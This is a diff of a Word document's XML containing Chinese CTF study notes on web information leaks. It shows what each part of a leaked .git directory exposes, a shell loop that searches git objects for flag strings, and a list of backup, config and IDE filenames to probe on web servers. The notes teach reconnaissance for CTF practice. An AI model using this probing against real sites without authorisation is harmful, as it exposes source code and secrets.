+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>全部源码（每个版本）</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="80"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>位置：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>objects/</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="80"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>危害：完整源码</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>全部提交历史</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="80"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>位置：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>objects/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> + </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>refs/</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="80"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>危害：开发过程、注释里的密码</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>未提交改动</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="80"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>位置：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>index</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="80"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>危害：暂存区敏感文件</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>被"藏起来"的改动</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="80"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>位置：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>refs/stash</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="80"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>危害：连 commit 都没进</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>被"删掉"的东西</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="80"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>位置：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>objects/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> + </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>logs/</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="80"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>危害：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>git rm</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 删不掉对象</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading4"/>
+      </w:pPr>
+      <w:r/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:b/>
+          <w:color w:val="2E548A"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>补充：万能兜底（不判断题型，扫全部对象）</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="252" w:lineRule="auto"/>
+        <w:ind w:left="283"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>git cat-file --batch-all-objects --batch-check='%(objecttype) %(objectname)' \</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="252" w:lineRule="auto"/>
+        <w:ind w:left="283"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  | awk '$1=="blob"{print $2}' \</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="252" w:lineRule="auto"/>
+        <w:ind w:left="283"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  | while read -r h; do</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="252" w:lineRule="auto"/>
+        <w:ind w:left="283"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">      c=$(git cat-file -p "$h" 2&gt;/dev/null | grep -oE '(ctfhub|flag)\{[^}]*\}' | head -1)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="252" w:lineRule="auto"/>
+        <w:ind w:left="283"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">      [ -n "$c" ] &amp;&amp; echo "★ $h → $c"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="252" w:lineRule="auto"/>
+        <w:ind w:left="283"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    done</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3748,7 +3404,1076 @@
           <w:color w:val="2E548A"/>
           <w:sz w:val="25"/>
         </w:rPr>
-        <w:t>2.2.4 HG（Mercurial）泄露</w:t>
+        <w:t>2.2.2 备份文件下载</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="80"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:b/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>六个载体：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:b/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>网站源码包</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>www.zip</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> / </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>web.tar.gz</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> / </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>backup.zip</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> / </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>site.rar</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:b/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>后缀变体</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>.bak</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>.old</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>.orig</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>.save</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>.swp</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>.copy</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>.tmp</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>.txt</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>.1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>~</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:b/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>编辑器缓存</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>（vim 系列，见 2.3）</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:b/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>系统元数据</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>.DS_Store</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> / </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>Thumbs.db</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> / </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>desktop.ini</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:b/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>配置密钥</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>.env</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> / </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>Dockerfile</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> / </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>docker-compose.yml</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> / </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>.gitlab-ci.yml</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:b/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>IDE 工程</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>.idea/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> / </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>.vscode/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> / </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>.settings/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> / </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>*.iml</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="80"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:b/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>为什么 `.bak` 能读源码</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>：服务器按</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:b/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>最后扩展名</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>决定解析。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="252" w:lineRule="auto"/>
+        <w:ind w:left="283"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
